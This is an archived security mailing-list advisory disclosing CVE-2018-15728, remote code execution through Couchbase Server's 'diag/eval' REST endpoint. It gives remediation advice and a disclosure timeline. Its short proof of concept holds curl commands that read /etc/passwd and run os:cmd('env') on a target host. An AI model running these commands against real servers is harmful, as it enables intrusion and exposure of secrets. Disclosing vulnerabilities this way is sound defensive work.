| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <732f7492-abda-4162-a896-7c686496a0a2@journal.report.generator>
Date: Thu, 23 Aug 2018 09:22:34 +0000
From: x ksi <s3810@...stk.edu.pl>
To: <fulldisclosure@...lists.org>, <bugtraq@...urityfocus.com>
Subject: Couchbase Server - Remote Code Execution
Sender: s3810@...stk.edu.pl
Subject: Couchbase Server - Remote Code Execution
Message-Id: <CAN10O-YorWdFmOh6kZDG1=R6+S5GQTQbSQms0DGjR8pDhr2MFQ@...l.gmail.com>
Recipient: Lanware.Security@...ware.co.uk
______________________________________________________________________
This email and any attachments to it may be confidential and are intended solely for the use of the individual to whom it is addressed. Any views or opinions expressed are solely those of the author and do not necessarily represent those of Lanware Ltd. If you have received this e-mail in error, please notify the sender and delete this email (including any attachments) from your system. Lanware may monitor email traffic data and content of email for the purpose of security.
Lanware Ltd, 62-64 Cornhill EC3V 3NH. Registered in England and Wales. Registration No. 2815552. Telephone +44 (0) 207 150 1100
Received: from GCHQ-GWR-EXCH01.internal.lanware.co.uk (10.80.1.204) by
GCHQ-GWR-EXCH01.internal.lanware.co.uk (10.80.1.204) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
15.1.1466.3; Thu, 23 Aug 2018 09:50:33 +0100
Received: from mail6.bemta25.messagelabs.com (195.245.230.107) by
mail.lanware.co.uk (10.80.1.151) with Microsoft SMTP Server id 15.1.1466.3
via Frontend Transport; Thu, 23 Aug 2018 09:50:33 +0100
Return-Path: bugtraq-return-59704-security=lanware.co.uk@...urityfocus.com
Received: from [46.226.52.199] (using TLSv1.2 with cipher DHE-RSA-AES256-GCM-SHA384 (256 bits))
by server-3.bemta.az-b.eu-west-1.aws.symcld.net id D1/FA-19860-9557E7B5; Thu, 23 Aug 2018 08:50:33 +0000
Authentication-Results: mx.messagelabs.com; spf=pass
(server-10.tower-287.messagelabs.com: domain of securityfocus.com
designates 195.245.230.82 as permitted
sender)smtp.mailfrom=securityfocus.com
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFmpnk+JIrShJLcpLzFFi42I5/PVZkG5EaV2
0wY9t6hZf/39idmD06Pg2hSWAMYo1My8pvyKBNWPdooyCP4IVLyYFNjD+4u9i5OAQEvCRuHnG
qYuRE8g8ySgx87U/iC0h4CexYPoxFpASCQFHiYffCiDCShItHYvYIWwDiaYXs5ggSkQkJjdZQ
ZhaEnvWQFWIS0xeuJIZYriHxI9fl4EGcgHZKxglTp0/zwTh3GWU+Leonw2iykXiXOs9FhCbV8
BJ4uGO+6wgtoCAgMS/SRfA4jwCOhL3T7UyQ9i6Er8+zmSCsI0kzu7rh6pxkDi58iYjhG0j8fp
RJ1g9i4CJxOqn29ghbFOJUwuWscFcN3XBBrDrJAT+s0m83biXCeIFRYlXE9+xQNgOEi9vLmOE
sBUkVv34xQphW0vsfbKIqIDgAlo7hVli5YMPTBMYtWeBvSkocXLmExYQm1lAU6J1+2/2BYxMq
xgtkooy0zNKchMzc3QNDQx0DQ2NdA0tzYDYWC+xSjdJL7VUtzy1uETXUC+xvFivuDI3OSdFLy
+1ZBMjMDkwAMEOxnPfkg8xSnIwKYnyfvavjRbiS8pPqcxILM6ILyrNSS0+xCjDwaEkwfuxuC5
aSLAoNT21Ii0zB5imYNISHDxKIrx2JUBp3uKCxNzizHSI1ClGY44Xi3omMXP8eT91ErMQS15+
XqqUOK8aSKkASGlGaR7cIFj6vMQoKyXMywh0mhBPQWpRbmYJqvwrRnEORiVh3mqQKTyZeSVw+
14BncIEdAorcy3IKSWJCCmpBkamTZXdLkciO3ffzwwrO/jl6byvpvu+Hw/aMu/3TbF9qQ9F78
w7YqjKG9T2T9REpPjwqRjH8J17/U/9OtUavuv81GKx8iUKYjZXeBhVeG1lNd1WsbXWV+x83DJ
jyeV/G57fVej4suzj9MRzhy60ty4wzGv8tzDLZerEKQ1rM48UXC6czqHDdD5fiaU4I9FQi7mo
OBEAXbB6c5oDAAA=
X-Env-Sender: bugtraq-return-59704-security=lanware.co.uk@...urityfocus.c
om
X-Msg-Ref: server-10.tower-287.messagelabs.com!1535014232!7612004!1
X-Originating-IP: [195.245.230.82]
X-SpamReason: No, hits=0.0 required=7.0 tests=
X-StarScan-Received:
X-StarScan-Version: 9.9.15; banners=-,-,-
X-VirusChecked: Checked
Received: (qmail 25673 invoked from network); 23 Aug 2018 08:50:32 -0000
Received: from mail3.bemta25.messagelabs.com (HELO mail3.bemta25.messagelabs.com) (195.245.230.82)
by server-10.tower-287.messagelabs.com with SMTP; 23 Aug 2018 08:50:32 -0000
Received: from [46.226.52.192] (using TLSv1.2 with cipher DHE-RSA-AES256-GCM-SHA384 (256 bits))
by server-2.bemta.az-b.eu-west-1.aws.symcld.net id 0F/3F-20055-8557E7B5; Thu, 23 Aug 2018 08:50:32 +0000
X-Env-Sender: bugtraq-return-59704-security=lanware.co.uk@...urityfocus.c
om
X-Msg-Ref: server-3.tower-280.messagelabs.com!1535014200!71964!76
X-Originating-IP: [34.237.219.205]
X-SYMC-ESS-Client-Auth: outbound-route-from=fail
X-StarScan-Received:
X-StarScan-Version: 9.14.24; banners=-,-,-
X-VirusChecked: Checked
Received: (qmail 20279 invoked from network); 23 Aug 2018 08:50:32 -0000
Received: from ec2-34-237-219-205.compute-1.amazonaws.com (HELO symds.io) (34.237.219.205)
by server-3.tower-280.messagelabs.com with SMTP; 23 Aug 2018 08:50:32 -0000
Received: from lists.securityfocus.com (ip-100-122-156-127.us-east-1.ec2.aws.symcpe.net [100.122.156.127])
by symds.io (Postfix) with SMTP id B6A9FF1F8
for <security@...ware.co.uk>; Thu, 23 Aug 2018 08:42:43 +0000 (UTC)
Received: (qmail 18484 invoked by alias); 23 Aug 2018 08:40:41 -0000
Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@...urityfocus.com>
List-Help: <mailto:bugtraq-help@...urityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
Delivered-To: mailing list bugtraq@...urityfocus.com
Delivered-To: moderator for bugtraq@...urityfocus.com
Received: (qmail 31427 invoked from network); 23 Aug 2018 05:05:27 -0000
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFtrJIsWRWlGSWpSXmKPExsXiVRtkqjvNoS7
a4MgLQYvmC+kOjB73z9xiD2CMYs3MS8qvSGDNWLcoo+CPYMWLSYENjL/4uxi5OIQEpjBKHN48
jQnEYRGYwiyx8sEHMEdC4AeLxOJZRxi7GDmBnDqJu90LoewiidbtHSwQdoXE+Wk7wWxeAUGJk
zOfgNlCAmESd76sYAWx2QQUJRoXrmcCsVkEVCXObtrNBlEfIHH17w+wuLCAocTp3onsILaIgJ
XEzgv9YLuYBTSBdv1mn8DINwvJillIUgsYmVYxWiQVZaZnlOQmZuboGhoY6BoaGusa6ppZ6iV
W6SbqpZbqJqfmlRQlAiX1EsuL9Yorc5NzUvTyUks2MQKDjgEIdjDu2ZdyiFGSg0lJlPezf220
EF9SfkplRmJxRnxRaU5q8SFGGQ4OJQleG/u6aCHBotT01Iq0zBxg+MOkJTh4lER4/e2A0rzFB
Ym5xZnpEKlTjJYcLxb1TGLmmLByEpD8837qJGYhlrz8vFQpcV4nkHkCIA0ZpXlw42AxeolRVk
qYlxHoQCGegtSi3MwSVPlXjOIcjErCvBEgU3gy80rgtr4COogJ6CBW5lqQg0oSEVJSDYwzt03
QtJ14XMzAZ50Y25bKsJeHz17xeHTXoSyZ34uf79Ydd6Nvxw3D7dIrz/7rsb8QI/7h4O0VmUYP
ZUV3HppbzZOc6iUtV3c1hU+d7YPttbUu321W1d0Svp10Z9sM4blb7nI4n4wTDPv8zb9QLWCq8
SrOl41PBdi+n62+P6vReO+knw5x7u+UWIozEg21mIuKEwE3eQ/czAIAAA==
X-Env-Sender: s3810@...stk.edu.pl
X-Msg-Ref: server-7.tower-221.messagelabs.com!1535000726!43957!1
X-Originating-IP: [74.125.82.53]
X-SpamReason: No, hits=0.0 required=7.0 tests=newsletters:
X-StarScan-Received:
X-StarScan-Version: 9.14.24; banners=-,-,-
X-VirusChecked: Checked
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=pjwstk.edu.pl; s=google;
h=mime-version:from:date:message-id:subject:to;
bh=vQvnD8rapUXqZ28JsES478JWn/b3GD+vFaMJ3PxsHwg=;
b=g0nXtLSEiJ4HjEfSqZ4YU/ALgmvt8N+I6HuJZ3anZwXoW6+pj9tK7JVFxTYzomMwtJ
TyL8ZS90jLmnqYpaI6TuZ3FnrZ8JOUeTwYgofi2eP+FcicGpzX5GXZlbH+MtQaSSupyG
jjg1zJOftfuKCk6UzCuaf1/bMRGEGeEOaRu6w=
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=1e100.net; s=20161025;
h=x-gm-message-state:mime-version:from:date:message-id:subject:to;
bh=vQvnD8rapUXqZ28JsES478JWn/b3GD+vFaMJ3PxsHwg=;
b=jpjZpKXcoyOUoZ3TuPVMSN7XVYHoGA7+ZcGMaSjGtAQNGgU5jRzLQt7Dce7zxVxJ0E
xRY/6uIgYo4IjCUj+n8+6xiqA4zzr6YzWDGLYI4UDhieNsxXWVzX97eOiVTWtOZkhDS6
wcuxHTLEzXZduW7ou0DzTWFly6hOY1uS4W4LKurDVROXN01l0uZ8WNGUZf+A+ctleOof
+2xq4jEBejy2CBBzTzZN7RGAQEZXGzE4dp/SHduxOcroPfngwPCCrKSvHGYYNEhcrf92
Jq/MeWHxs15i+E+2Qt5Y2Vi65FKDV7PwuUEZFnRW00OpuXrHq70Xp74TskT4YorGNNIu
qGVg==
X-Gm-Message-State: APzg51Cxfdrc9P2XPUptdpesPm/PSiADj6BUOxtbigSsMcE6jexQcZFe
XNU8NpBnwuiHRsvsaaxWZPs4R8dGgexU0PhSJZ3WmXeR28o=
X-Google-Smtp-Source: ANB0VdaYnLEk/MvDXc5futMFW9N9PesXbJ337wSPXGjGntDJx+gEd0ZtgaQ7ffsmYB+UzySdyxWEiggvju0a1aB+N/Y=
X-Received: by 2002:a1c:578a:: with SMTP id l132-v6mr4126502wmb.16.1535000725643;
Wed, 22 Aug 2018 22:05:25 -0700 (PDT)
MIME-Version: 1.0
From: x ksi <s3810@...stk.edu.pl>
Date: Thu, 23 Aug 2018 15:05:25 +1000
Message-ID: <CAN10O-YorWdFmOh6kZDG1=R6+S5GQTQbSQms0DGjR8pDhr2MFQ@...l.gmail.com>
Subject: Couchbase Server - Remote Code Execution
To: <fulldisclosure@...lists.org>, <bugtraq@...urityfocus.com>
Content-Type: text/plain; charset="UTF-8"
X-MS-Exchange-Organization-OriginalArrivalTime: 23 Aug 2018 08:50:33.1737
(UTC)
X-MS-Exchange-Organization-Network-Message-Id: 25376e6b-822a-4d5b-fb3f-08d608d57cab
X-MS-Exchange-Organization-OriginalClientIPAddress: 195.245.230.107
X-MS-Exchange-Organization-OriginalServerIPAddress: 10.80.1.151
X-MS-Exchange-Organization-Cross-Premises-Headers-Processed: GCHQ-GWR-EXCH01.internal.lanware.co.uk
X-MS-Exchange-Organization-OrderedPrecisionLatencyInProgress: LSRV=GCHQ-GWR-EXCH01.internal.lanware.co.uk:TOTAL-FE=0.046|SMR=0.051(SMRPI=0.008(SMRPI-FrontendProxyAgent=0.008));2018-08-23T08:50:33.220Z
X-MS-Exchange-Forest-ArrivalHubServer: GCHQ-GWR-EXCH01.internal.lanware.co.uk
X-MS-Exchange-Organization-AuthSource: GCHQ-GWR-EXCH01.internal.lanware.co.uk
X-MS-Exchange-Organization-AuthAs: Anonymous
X-MS-Exchange-Organization-FromEntityHeader: Internet
X-MS-Exchange-Organization-OriginalSize: 10014
X-MS-Exchange-Organization-HygienePolicy: Standard
X-MS-Exchange-Organization-MessageLatency: SRV=GCHQ-GWR-EXCH01.internal.lanware.co.uk:TOTAL-FE=0.062|SMR=0.051(SMRPI=0.008(SMRPI-FrontendProxyAgent=0.008))|SMS=0.016
X-MS-Exchange-Organization-AVStamp-Enterprise: 1.0
X-MS-Exchange-Organization-Recipient-Limit-Verified: True
X-MS-Exchange-Organization-TotalRecipientCount: 1
X-MS-Exchange-Forest-IndexAgent-0: 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
Pg0KICA8RW1haWxzPg0KICAgIDxFbWFpbCBTdGFydEluZGV4PSIxMz
U1Ij4NCiAgICAgIDxFbWFpbFN0cmluZz5zZWN1cml0eUBjb3VjaGJh
c2UuY29tPC9FbWFpbFN0cmluZz4NCiAgICA8L0VtYWlsPg0KICA8L0
VtYWlscz4NCjwvRW1haWxTZXQ+AQu2BDw/eG1sIHZlcnNpb249IjEu
MCIgZW5jb2Rpbmc9InV0Zi0xNiI/Pg0KPFVybFNldD4NCiAgPFZlcn
Npb24+MTUuMC4wLjA8L1ZlcnNpb24+DQogIDxVcmxzPg0KICAgIDxV
cmwgU3RhcnRJbmRleD0iMTczOCIgVHlwZT0iVXJsIj4NCiAgICAgID
xVcmxTdHJpbmc+aHR0cHM6Ly93d3cuY291Y2hiYXNlLmNvbS88L1Vy
bFN0cmluZz4NCiAgICA8L1VybD4NCiAgICA8VXJsIFN0YXJ0SW5kZX
g9IjE3NzAiIFR5cGU9IlVybCI+DQogICAgICA8VXJsU3RyaW5nPmh0
dHBzOi8vZGV2ZWxvcGVyLmNvdWNoYmFzZS5jb20vZG9jdW1lbnRhdG
lvbi9zZXJ2ZXIvY3VycmVudC9yZXN0LWFwaS9yZXN0LWludHJvLmh0
bWw8L1VybFN0cmluZz4NCiAgICA8L1VybD4NCiAgICA8VXJsIFN0YX
J0SW5kZXg9IjE4NjEiIFR5cGU9IlVybCI+DQogICAgICA8VXJsU3Ry
aW5nPmh0dHBzOi8vZGV2ZWxvcGVyLmNvdWNoYmFzZS5jb20vZG9jdW
1lbnRhdGlvbi9zZXJ2ZXIvMy54L2FkbWluL1Rhc2tzL3hkY3ItbW9k
aWZ5LXNldHRpbmdzLmh0bWw8L1VybFN0cmluZz4NCiAgICA8L1VybD
4NCiAgPC9VcmxzPg0KPC9VcmxTZXQ+AQ7PAVJldHJpZXZlck9wZXJh
dG9yLDEwLDA7UmV0cmlldmVyT3BlcmF0b3IsMTEsMTtQb3N0RG9jUG
Fyc2VyT3BlcmF0b3IsMTAsMDtQb3N0RG9jUGFyc2VyT3BlcmF0b3Is
MTEsMDtQb3N0V29yZEJyZWFrZXJEaWFnbm9zdGljT3BlcmF0b3IsMT
AsMTtQb3N0V29yZEJyZWFrZXJEaWFnbm9zdGljT3BlcmF0b3IsMTEs
MDtUcmFuc3BvcnRXcml0ZXJQcm9kdWNlciwyMCwzNA==
X-MS-Exchange-Forest-IndexAgent: 1 2704
X-MS-Exchange-Forest-EmailMessageHash: 68A7520F
X-MS-Exchange-Forest-Language: en
Hey,
Description:
Couchbase Server [1] exposes REST API [2] which by default is
available on TCP/8091 and/or TCP/18091.
Authenticated users can send arbitrary Erlang code to 'diag/eval'
endpoint of the API. The code will be subsequently executed in the
underlying operating system with privileges of the user which was used
to start Couchbase.
The 'diag/eval' endpoint was found to be referenced in the official
documentation [3][4][5], however, documentation doesn't contain any
information about the risks associated with allowing access to the
endpoint in question.
Unfortunately, I was not able to confirm which versions of Couchbase
are affected and whether 'diag/eval' endpoint is enabled by default.
You can use the PoC provided below in order to verify if your
installation is affected or not.
Proof of Concept:
1. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval
-X POST -d 'case file:read_file("/etc/passwd") of {ok, B} ->
io:format("~p~n", [binary_to_term(B)]) end.'
2. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval
-X POST -d 'os:cmd("env")'
Remediation:
Contact vendor for remediation guidance. Alternatively, restrict
access to the REST API and/or 'diag/eval' endpoint.
Timeline:
18.06.2018: Following vendor guidelines [6], the information about the
issue was sent to security@...chbase.com.
20.06.2018: Follow-up email was sent to the vendor to confirm receipt
of the original report.
21.08.2018: MDSec published advisory about the similar vulnerability
found in Apache CouchDB [7].
21.08.2018: CVE requested from MITRE.
22.08.2018: MITRE assigned CVE-2018-15728 for this issue.
23.08.2018: The advisory has been released.
References:
[1] https://www.couchbase.com/
[2] https://developer.couchbase.com/documentation/server/current/rest-api/rest-intro.html
[3] https://developer.couchbase.com/documentation/server/3.x/admin/Tasks/xdcr-modify-settings.html
[4] https://developer.couchbase.com/documentation/server/4.1/security/security-comm-encryption.html
[5] https://developer.couchbase.com/documentation/server/4.1/security/security-client-ssl.html
[6] https://www.couchbase.com/resources/security#VulnerabilityReporting
[7] https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/
Thanks,
Filip Palian
Powered by blists - more mailing lists